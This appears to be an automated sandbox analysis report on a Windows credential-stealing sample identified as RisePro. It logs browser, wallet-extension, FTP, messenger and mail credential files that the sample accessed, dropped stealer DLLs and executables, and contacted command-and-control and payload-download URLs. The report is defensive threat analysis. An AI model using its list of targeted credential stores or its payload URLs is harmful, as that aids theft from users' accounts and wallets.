Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_blnieiiffboillknjnepogjhkgnoapac_0.indexeddb.leveldb\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_cjelfplplebdjjenllpjcblmjkfcffne_0.indexeddb.leveldb\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\CentBrowser\User Data\Default\Login Data
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Comodo\Dragon\User Data\Default\Login Data
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\signons.sqlite
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Chedot\User Data\Default\Login Data
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\signons.sqlite
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Orbitum\User Data\Default\Login Data
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\formhistory.sqlite
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\logins.json
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Login Data
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENT
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Chromium\User Data\Default\Login Data
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\logins.json
Tries to harvest and steal ftp login credentials
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xml
Tries to steal Instant Messenger accounts or passwords
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\.purple\accounts.xml Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\System32\.purple\accounts.xml Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\.purple\accounts.xml Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\.purple\accounts.xml Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\.purple\accounts.xml Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\.purple\accounts.xml Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\.purple\accounts.xml Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\ImmersiveControlPanel\.purple\accounts.xml Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\System32\oobe\.purple\accounts.xml Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Program Files (x86)\ctdHFaOFtzZOUECZpaTYJiPURhhWvconESoaMbLeFCEZNaYeLeGhbWPiOEzlzfBKb\.purple\accounts.xml Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Temp\09fd851a4f\.purple\accounts.xml Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\SysWOW64\.purple\accounts.xml Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\System32\{6D809377-6AF0-444B-8957-A3773F02200E}\Common Files\microsoft shared\ClickToRun\.purple\accounts.xml Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\.purple\accounts.xml Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\System32\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\ImmersiveControlPanel\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\System32\oobe\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Program Files (x86)\ctdHFaOFtzZOUECZpaTYJiPURhhWvconESoaMbLeFCEZNaYeLeGhbWPiOEzlzfBKb\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Temp\09fd851a4f\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\SysWOW64\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\System32\WindowsPowerShell\v1.0\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Temp\1000055001\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Temp\4d0ab15804\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Program Files\Google\Chrome\Application\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Temp\1000056001\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\System32\{6D809377-6AF0-444B-8957-A3773F02200E}\Common Files\microsoft shared\ClickToRun\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe File opened: C:\.purple\accounts.xml
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\ProgramData\MPGPH131\MPGPH131.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
OS version to string mapping found (often used in BOTs)
Source: bad48ea9ac.exe, 0000001F.00000003.2791393164.00000000012F1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: WIN_XP
Source: bad48ea9ac.exe, 0000001F.00000002.2814535383.00000000008C2000.00000002.00000001.01000000.00000010.sdmp Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: bad48ea9ac.exe, 0000000F.00000003.2681540160.0000000001653000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: WIN_XP/
Yara detected Credential Stealer
Source: Yara match File source: 00000028.00000002.2907223447.00000000014D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2888771295.00000000018AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 590971cd60.exe PID: 5804, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected RisePro Stealer
Source: Yara match File source: 00000014.00000002.2888771295.0000000001868000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2487222595.00000000053D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.2619416783.0000000005440000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000002.2927751545.0000000008107000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000037.00000003.2871931818.0000000005440000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002E.00000002.2897094573.00000000002E1000.00000040.00000001.01000000.00000019.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.2553507559.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000003.2553727448.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002E.00000003.2702706239.0000000004BA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000002.2895798421.0000000000631000.00000040.00000001.01000000.00000017.sdmp, type: MEMORY
Source: Yara match File source: 00000037.00000002.2895930049.0000000000B81000.00000040.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.2747704687.0000000000631000.00000040.00000001.01000000.00000017.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2886812747.0000000000B81000.00000040.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 590971cd60.exe PID: 5804, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MPGPH131.exe PID: 5236, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\aMLtP386CmzygUXw7MGrDsU.zip, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\4JKZLoG_AJreMfNRzAg0gnZ.zip, type: DROPPED
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_00B002D8 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo, 6_2_00B002D8
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_00AFF5E1 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::GetInternalContext, 6_2_00AFF5E1
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1428439 Sample: UeW2b6mU6Z.exe Startdate: 18/04/2024 Architecture: WINDOWS Score: 100 119 play.google.com 2->119 121 ipinfo.io 2->121 123 db-ip.com 2->123 167 Snort IDS alert for network traffic 2->167 169 Found malware configuration 2->169 171 Antivirus detection for URL or domain 2->171 173 16 other signatures 2->173 10 explorha.exe 2 32 2->10         started        15 UeW2b6mU6Z.exe 5 2->15         started        17 chrosha.exe 2->17         started        19 9 other processes 2->19 signatures3 process4 dnsIp5 141 193.233.132.167, 49739, 49744, 49746 FREE-NET-ASFREEnetEU Russian Federation 10->141 143 193.233.132.56, 49737, 49738, 49740 FREE-NET-ASFREEnetEU Russian Federation 10->143 101 C:\Users\user\AppData\Roaming\...\cred64.dll, PE32+ 10->101 dropped 103 C:\Users\user\AppData\Roaming\...\clip64.dll, PE32 10->103 dropped 105 C:\Users\user\AppData\...\590971cd60.exe, PE32 10->105 dropped 115 8 other malicious files 10->115 dropped 205 Creates multiple autostart registry keys 10->205 227 3 other signatures 10->227 21 590971cd60.exe 10->21         started        26 amert.exe 10->26         started        28 rundll32.exe 10->28         started        38 3 other processes 10->38 107 C:\Users\user\AppData\Local\...\explorha.exe, PE32 15->107 dropped 207 Detected unpacking (changes PE section rights) 15->207 209 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 15->209 211 Tries to evade debugger and weak emulator (self modifying code) 15->211 229 2 other signatures 15->229 30 explorha.exe 15->30         started        109 C:\Users\user\AppData\Roaming\...\cred64.dll, PE32+ 17->109 dropped 111 C:\Users\user\AppData\Roaming\...\clip64.dll, PE32 17->111 dropped 117 2 other malicious files 17->117 dropped 213 Antivirus detection for dropped file 17->213 215 Tries to detect sandboxes and other dynamic analysis tools (window names) 17->215 217 Machine Learning detection for dropped file 17->217 32 rundll32.exe 17->32         started        34 rundll32.exe 17->34         started        145 127.0.0.1 unknown unknown 19->145 113 C:\Users\user\...\4JKZLoG_AJreMfNRzAg0gnZ.zip, Zip 19->113 dropped 219 Binary is likely a compiled AutoIt script file 19->219 221 Tries to steal Mail credentials (via file / registry access) 19->221 223 Tries to shutdown other security tools via broadcasted WM_QUERYENDSESSION 19->223 225 Tries to harvest and steal browser information (history, passwords, etc) 19->225 36 chrome.exe 19->36         started        40 2 other processes 19->40 file6 signatures7 process8 dnsIp9 125 147.45.47.93, 49799, 58709 FREE-NET-ASFREEnetEU Russian Federation 21->125 127 ipinfo.io 34.117.186.192, 443, 49802 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG United States 21->127 129 db-ip.com 104.26.5.15, 443, 49804 CLOUDFLARENETUS United States 21->129 93 C:\Users\user\AppData\Local\...\RageMP131.exe, PE32 21->93 dropped 95 C:\ProgramData\MPGPH131\MPGPH131.exe, PE32 21->95 dropped 97 C:\Users\user\...\aMLtP386CmzygUXw7MGrDsU.zip, Zip 21->97 dropped 179 Detected unpacking (changes PE section rights) 21->179 181 Tries to detect sandboxes and other dynamic analysis tools (window names) 21->181 183 Tries to steal Mail credentials (via file / registry access) 21->183 201 3 other signatures 21->201 42 schtasks.exe 21->42         started        44 schtasks.exe 21->44         started        46 WerFault.exe 21->46         started        99 C:\Users\user\AppData\Local\...\chrosha.exe, PE32 26->99 dropped 185 Tries to evade debugger and weak emulator (self modifying code) 26->185 187 Hides threads from debuggers 26->187 189 Tries to detect sandboxes / dynamic malware analysis system (registry check) 26->189 48 rundll32.exe 25 28->48         started        191 Antivirus detection for dropped file 30->191 193 Multi AV Scanner detection for dropped file 30->193 195 Machine Learning detection for dropped file 30->195 203 3 other signatures 30->203 51 rundll32.exe 32->51         started        197 System process connects to network (likely due to code injection or exploit) 34->197 53 chrome.exe 36->53         started        60 2 other processes 36->60 199 Binary is likely a compiled AutoIt script file 38->199 56 chrome.exe 38->56         started        58 chrome.exe 40->58         started        file10 signatures11 process12 dnsIp13 62 conhost.exe 42->62         started        64 conhost.exe 44->64         started        157 Tries to steal Instant Messenger accounts or passwords 48->157 159 Uses netsh to modify the Windows network and firewall settings 48->159 161 Tries to harvest and steal WLAN passwords 48->161 66 powershell.exe 48->66         started        70 netsh.exe 2 48->70         started        163 Tries to harvest and steal ftp login credentials 51->163 165 Tries to harvest and steal browser information (history, passwords, etc) 51->165 72 powershell.exe 51->72         started        74 netsh.exe 51->74         started        131 108.177.122.99 GOOGLEUS United States 53->131 133 172.217.215.136 GOOGLEUS United States 53->133 139 6 other IPs or domains 53->139 135 192.168.2.4, 443, 49723, 49724 unknown unknown 56->135 137 239.255.255.250 unknown Reserved 56->137 76 chrome.exe 56->76         started        79 chrome.exe 56->79         started        81 2 other processes 56->81 signatures14 process15 dnsIp16 91 C:\Users\user\...\246122658369_Desktop.zip, Zip 66->91 dropped 175 Found many strings related to Crypto-Wallets (likely being stolen) 66->175 177 Loading BitLocker PowerShell Module 66->177 83 conhost.exe 66->83         started        85 conhost.exe 70->85         started        87 conhost.exe 72->87         started        89 conhost.exe 74->89         started        147 youtube-ui.l.google.com 108.177.122.91, 443, 49747 GOOGLEUS United States 76->147 149 www3.l.google.com 142.250.105.138, 443, 49783 GOOGLEUS United States 76->149 155 4 other IPs or domains 76->155 151 74.125.138.101 GOOGLEUS United States 79->151 153 play.google.com 79->153 file17 signatures18 process19
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
34.117.186.192
 ipinfo.io United States
139070 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG false
104.26.5.15
 db-ip.com United States
13335 CLOUDFLARENETUS false
193.233.132.56
 unknown Russian Federation
2895 FREE-NET-ASFREEnetEU true
142.250.105.138
 www3.l.google.com United States
15169 GOOGLEUS false
147.45.47.93
 unknown Russian Federation
2895 FREE-NET-ASFREEnetEU true
172.217.215.136
 unknown United States
15169 GOOGLEUS false
193.233.132.167
 unknown Russian Federation
2895 FREE-NET-ASFREEnetEU true
239.255.255.250
 unknown Reserved
unknown unknown false
108.177.122.91
 youtube-ui.l.google.com United States
15169 GOOGLEUS false
64.233.177.101
 unknown United States
15169 GOOGLEUS false
64.233.176.103
 www.google.com United States
15169 GOOGLEUS false
74.125.138.101
 unknown United States
15169 GOOGLEUS false
108.177.122.99
 unknown United States
15169 GOOGLEUS false

Private

IP
192.168.2.4
127.0.0.1

Contacted Domains

Name IP Active
youtube-ui.l.google.com 108.177.122.91 true
www3.l.google.com 142.250.105.138 true
play.google.com 173.194.219.139 true
ipinfo.io 34.117.186.192 true
www.google.com 64.233.176.103 true
db-ip.com 104.26.5.15 true
accounts.youtube.com unknown unknown
www.youtube.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://193.233.132.56/Pneh2sXQk0/index.php?wal=1 true
    		unknown
    http://193.233.132.56/Pneh2sXQk0/Plugins/clip64.dll true
      		unknown
      https://www.youtube.com/account false
        		high
        https://www.google.com/favicon.ico false
          		high
          http://193.233.132.167/cost/random.exe true
            		unknown
            http://193.233.132.167/cost/sarra.exe true
              		unknown
              http://193.233.132.56/Pneh2sXQk0/Plugins/cred64.dll true
                		unknown
                http://193.233.132.167/mine/random.exe true
                  		unknown
                  http://193.233.132.56/Pneh2sXQk0/index.php true
                    		unknown
                    http://193.233.132.167/enigma/index.php true
                      		unknown